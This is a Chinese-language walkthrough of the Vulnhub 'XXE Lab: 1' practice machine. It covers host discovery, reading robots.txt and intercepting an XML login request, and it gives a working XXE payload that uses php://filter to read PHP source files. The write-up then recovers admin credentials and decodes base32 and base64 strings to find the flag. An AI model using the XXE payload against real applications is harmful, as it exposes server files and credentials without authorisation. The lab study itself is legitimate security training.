Vulnhub系列靶机---XXE Lab: 1

文章目录

靶机文档:XXE Lab: 1

下载地址:Download (Mirror)

告诉了利用点:http://your-ip/xxe

信息收集

主机发现

端口扫描

目录扫描

访问robots.txt

访问/xxe

随意输入账密,登陆抓包

看到登陆的格式就是XML语言的数据格式

漏洞利用

payload:

xml 复制代码
<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY admin SYSTEM "php://filter/read=convert.base64-encode/resource=xxe.php">
]>
<root><name>&admin;</name><password>hj</password></root>

将选中base64格式的数据,发送到Decoder模块,去解码

刚才robots.txt文件里还显示有一个admin.php,尝试读取一下

解码发现了用户名和密码

用户名:administhebest

密码解密后是admin@123

还发现了/flagmoout.php

先用得到的账密进行登陆

也跳转到了/flagmeout.php

base64解码后得到一串base32格式的数据

复制代码
JQZFMMCZPE4HKWTNPBUFU6JVO5QUQQJ5

解码地址:https://www.qqxiuzi.cn/bianma/base.php

解码后得到base64格式的

再进行base64解码,得到一个路径,再次外部实体注入

运行需要php版本较低 ,高版本会报错,导致出不来结果

php5.6在线运行

相关推荐
CTO Plus技术服务中5 小时前
一栈式、系统性的C、C++、Go、网络安全、Linux运维开发笔记和面试笔记
c++·web安全·golang
mooyuan天天5 小时前
upload-labs通关笔记-第17关文件上传之二次渲染png格式(python脚本法)
web安全·文件上传·文件上传漏洞·upload-labs·二次渲染
Qaz555666915 小时前
网络安全笔记(第一二天)
笔记·安全·web安全
hzb666665 小时前
xd_day28js原生开发-day31 day41asp.net
开发语言·前端·javascript·安全·web安全
渐雨朦胧眼5 小时前
网络安全之防御保护笔记
笔记·安全·web安全
轻造科技21 小时前
设备点检系统+移动端APP:替代纸质点检表,漏检率降为0
网络·安全·web安全
沈千秋.1 天前
文件包含[一道CTF题]
web安全·文件包含
祁白_1 天前
文件包含笔记整理
笔记·学习·安全·web安全
恃宠而骄的佩奇1 天前
网络安全面试题——安全服务
web安全·网络安全·面试·奇安信
乾元1 天前
当奥本海默遇到图灵:AI 开启的网络安全新纪元
服务器·网络·人工智能·网络协议·安全·web安全